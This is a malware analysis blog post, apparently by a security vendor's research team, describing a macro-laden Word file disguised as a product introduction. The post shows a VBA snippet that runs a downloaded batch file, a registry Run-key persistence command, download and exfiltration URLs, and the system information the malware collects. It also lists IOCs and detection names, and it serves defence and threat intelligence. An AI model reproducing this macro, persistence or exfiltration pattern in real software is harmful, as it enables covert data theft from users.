Malicious Word Files Disguised as Product Introduction

The ASEC analysis team has discovered a word document that is in the same category as the document introduced in the post <Word File Disguised as a Design Modification Request for Information Theft>, uploaded in December last year. The title of the document confirmed in this case is ‘Product Introduction.doc’. Given that the document includes descriptions for certain products, the attacker likely targeted companies related to distribution and shopping.

The document contains an image that is the same as the one included in the previous malicious document, prompting users to run the macro.

Figure 1. Inside Product Introduction.doc

The properties of the document (Created, Author, and Last Modified By) are the same as those of ‘Design Modification Request.doc’. It seems that the attacker is reusing the same file after editing it.

Figure 2. Document properties (left: Design Modification Request.doc / right: Product Introduction.doc)

The document contains a malicious VBA macro. When the macro is executed, a malicious macro is automatically run through the Document_Open() function. The macro code is slightly more obfuscated than before, downloading additional files from hxxp://manage-box.com/ord03 or /doc03.

Figure 3. Part of VBA macro code included in the Word document

The following files are downloaded through the VBA macro. Inside the downloaded file setup.cab, there exist a total of 5 scripts (download.vbs, error.bat, no4.bat, start.vbs, and upload.vbs).

Download URLSave path and file name
hxxp://manage-box[.]com/ord03/no03.txtC:\Users\Public\Documents\no1.bat
hxxp://manage-box[.]com/ord03/vbs03.txtC:\Users\Public\Documents\setup.cab
hxxp://manage-box[.]com/doc03/temp1403.docC:\Users\Public\Documents\temp.doc
Table 1. Download URL and save path

The macro then runs the downloaded file temp.doc. The word document is disguised as a document of a certain company and contains information about particular products.

Figure 4. Inside temp.doc file

The temp.doc document also has the same properties (Created, Author, and Last Modified By) as those from the Design Modification Request.doc file.

Figure 5. Document properties
(left: temp.doc downloaded by Design Modification Request.doc
right: temp.doc downloaded by Product Introduction.doc)

The temp.doc document also harbors a VBA macro that runs the no1.bat file that was downloaded earlier.

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal nCmdShow As Long _
) As Long

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

The no1.bat file cannot be confirmed at the moment. Yet as the feature of each script is identical to those in the blog post uploaded earlier, it is likely that the file runs the error.bat file like in the previous case. The table below shows the key behaviors of each script file.

FilenameKey Behaviors
error.batRegisters start.vbs to registry
Runs no4.bat
Downloads additional files
start.vbsRuns Error.bat
no4.batCollects and sends information
download.vbsPerforms download features
upload.vbsPerforms upload features
Table 2. Script names and their key behaviors

The following command is performed when the error.bat file is executed, allowing start.vbs to run continuously.

  • “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v svchostno2 /t REG_SZ /d “C:\Users\Public\Documents\start.vbs”

Afterward, the command runs no4.bat and checks for the existence of certain files. It then downloads additional files from hxxp://safemaners.com/dow11/%COMPUTERNAME%.txt. The no4.bat file collects information of the user PC as shown below and sends it to hxxp://safemaners[.]com/upl11/upload.php.

Collected ItemsSaved File Name
C:\Users\%username%\downloads\ list%~dp0\cuserdown.txt
C:\Users\%username%\documents\ list%~dp0\cuserdocu.txt
C:\Users\%username%\desktop\ list%~dp0\cuserdesk.txt
C:\Program Files\ list%~dp0\cprog.txt
IP information%~dp0\ipinfo.txt
tasklist%~dp0\tsklt.txt
systeminfo%~dp0\systeminfo.txt
Table 3. Collected items and saved file names

Currently, accessing the malicious URL (manage-box[.]com and safemaners[.]com) in the word document and script file redirects the user to mail.naver.com. It appears that the attacker is trying to mask the website to make it seem harmless to users.

Since it has been confirmed that there are malicious word documents containing information on distribution and shopping instead of North Korea-related materials, caution is advised for Korean users whom the attacker appears to be targeting. Users should refrain from opening attachments from emails sent from unknown users and make sure to check the sender even when the information is relevant to their situations.

[V3 Detection]

  • Downloader/DOC.Generic
  • Trojan/DOC.Agent
  • Trojan/VBS.Runner
  • Trojan/BAT.Agent
  • Downloader/BAT.Generic

[Relevant IOC Info]

  • 10610cfe6cbf5a7dd5198a87e3186294
  • 7bc342318717ac411898324baf549b76
  • dc5ecb12dae64202922437edbe5a4842
  • hxxp://manage-box.com/ord03/no03.txt
  • hxxp://manage-box.com/ord03/vbs03.txt
  • hxxp://manage-box.com/doc03/temp1403.doc
  • hxxp://safemaners[.]com/upl11/upload.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
guest
2 Comments
Inline Feedbacks
View all comments
trackback

[…] The macro’s author and its execution flow are identical to that which was introduced in the ASEC blog post uploaded on March 17th (Title:  Malicious Word Files Disguised as Product Introduction). It appears that all three […]

trackback

[…] The file was created on March 28th, and its author’s name is the same as the author (Acer) that was introduced in the previous ASEC blog. […]